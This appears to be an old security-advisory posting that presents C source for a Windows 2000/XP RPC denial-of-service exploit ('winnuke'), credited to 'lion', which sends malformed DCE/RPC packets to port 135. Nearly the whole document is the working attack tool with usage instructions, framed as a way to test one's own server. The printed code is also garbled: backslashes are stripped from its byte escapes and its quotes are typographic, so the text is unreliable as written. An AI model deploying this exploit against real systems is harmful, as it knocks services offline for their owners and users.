‘Windows RPC DoS Exploit Code (from SPIKE to C)’

Summary

‘The following exploit code will allow you to test your server for the Windows RPC DoS vulnerability noted in our previous article: Windows RPC Service DoS (SPIKE).’

Credit:

‘The information has been provided by lion.’


Details

Exploit:
/*
************************************************************************
* MS WIN RPC DoS CODE FROM SPIKE v2.7
*
* Compile it use:
* cl winnuke.c
*
* Usage:
* winnuke targetip
*
* Code by lion, Welcomde to HUC Website Http://www.cnhonker.com
* 2002/10/22
************************************************************************
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, ‘ws2_32.lib’)

char sendcode1[] =
  ‘x05x00x0bx03x10x00x00x00x48x00x00x00x02x00x00x00’
  ‘xd0x16xd0x16x00x00x00x00x01x00x00x00x00x00x01x00’
  ‘x60x9exe7xb9x52x3dxcex11xaaxa1x00x00x69x01x29x3f’
  ‘x02x00x02x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00’
  ‘x2bx10x48x60x02x00x00x00x05x00x00x01x10x00x00x00’
  ‘xd0x16x00x00x8fx00x00x00x20x27x01x00x00x00x02x00’
  ‘xf0x00x00x00x00x00x00x00xf0x00x00x00’;

char sendcode2[] =
  ‘x88x13x00x00x00x00x00x00x88x13x00x00’;

char sendcode3[] =
  ‘xffxffxffxffxffxffxffxffx00x00x00x00x00x00x00x00’
  ‘x00x00x00x00x00x02x00x00x00x00x00x00x00x02x00x00’;

char sendcode4[] =
  ‘xfexffx00x00x00x00x00x00xfexffx00x00x3dx3dx3dx3d’
  ‘x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3d’
  ‘x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00’
  ‘x50x10x01x00x00x00x02x00’;

char sendcode5[] =
  ‘x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00’
  ‘x80xf9x00x00x00x00x02x00’;

char sendcode6[] =
  ‘x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00’
  ‘xb0xe2x00x00x00x00x02x00’;

char sendcode7[] =
  ‘x05x00x00x02x10x00x00x00x60x15x00x00x8fx00x00x00’
  ‘x60x15x00x00x00x00x02x00’;

char sendcode8[] =
  ‘x00x00x01x10x00x00x00x00x00x00x01x10x00x00’;

int main(int argc, char *argv[])
{
  WSADATA wsaData;
  WORD wVersionRequested;
  struct hostent *pTarget;
  struct sockaddr_in sock;
  char *targetip;
  int port,bufsize;
  SOCKET s;
  char buffer[20480];

  printf(‘========================= HUC Win2000/XP RPC Nuke V0.10 =======================rn’);
  printf(‘================= By Lion, Welcome to http://www.cnhonker.com =================rnn’);

  if (argc < 2)
  {
    printf(‘Usage:rn’);
    printf(‘ %s <TargetIP> [TargetPort]rn’, argv[0]);
    printf(‘Example:rn’);
    printf(‘ %s 192.168.0.1rn’, argv[0]);
    printf(‘ %s 192.168.0.1 135rn’, argv[0]);
    printf(‘PS:rn’);
    printf(‘ If target is XP, try 2 times.rn’);
    exit(1);
  }

  wVersionRequested = MAKEWORD(1, 1);
  if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

  targetip = argv[1];
  port = 135;
  if (argc >= 3) port = atoi(argv[2]);
  bufsize = 512;
  if (argc >= 4) bufsize = atoi(argv[3]);

  s = socket(AF_INET, SOCK_STREAM, 0);
  if(s==INVALID_SOCKET)
  {
    printf(‘Socket error!rn’);
    exit(1);
  }

  printf(‘Resolving Hostnames…n’);
  if ((pTarget = gethostbyname(targetip)) == NULL)
  {
    printf(‘Resolve of %s failed, please try again.n’, argv[1]);
    exit(1);
  }

  memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
  sock.sin_family = AF_INET;
  sock.sin_port = htons((USHORT)port);

  printf(‘Connecting…n’);
  if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
  {
    printf(‘Couldn’t connect to host.n’);
    exit(1);
  }

  printf(‘Connected!…n’);
  printf(‘Sending Packets…n’);
  if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
  {
    printf(‘Error sending nuke Packetsrn’);
    closesocket(s);
    exit(1);
  }

  memset(&buffer, ‘x41’, 240);
  send(s, buffer, 240, 0);

  send(s, sendcode2, sizeof(sendcode2)-1, 0);
  memset(&buffer, ‘x42’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode3, sizeof(sendcode3)-1, 0);
  memset(&buffer, ‘x43’, 512);
  send(s, buffer, 512, 0);
  
  send(s, sendcode4, sizeof(sendcode4)-1, 0);
// memset(&buffer, ‘x44’, 20480);
// send(s, buffer, 20480, 0);

// /*
  memset(&buffer, ‘x44’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode5, sizeof(sendcode5)-1, 0);
  memset(&buffer, ‘x45’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode6, sizeof(sendcode6)-1, 0);
  memset(&buffer, ‘x46’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode7, sizeof(sendcode7)-1, 0);
  memset(&buffer, ‘x47’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode8, sizeof(sendcode8)-1, 0);
  memset(&buffer, ‘x48’, 5000);
  send(s, buffer, 5000, 0);
  
// */
  printf(‘Nuked! rnIf target is XP, try a again! :)rn’);
  closesocket(s);
  WSACleanup();
  return 0;
}’

Categories: Exploits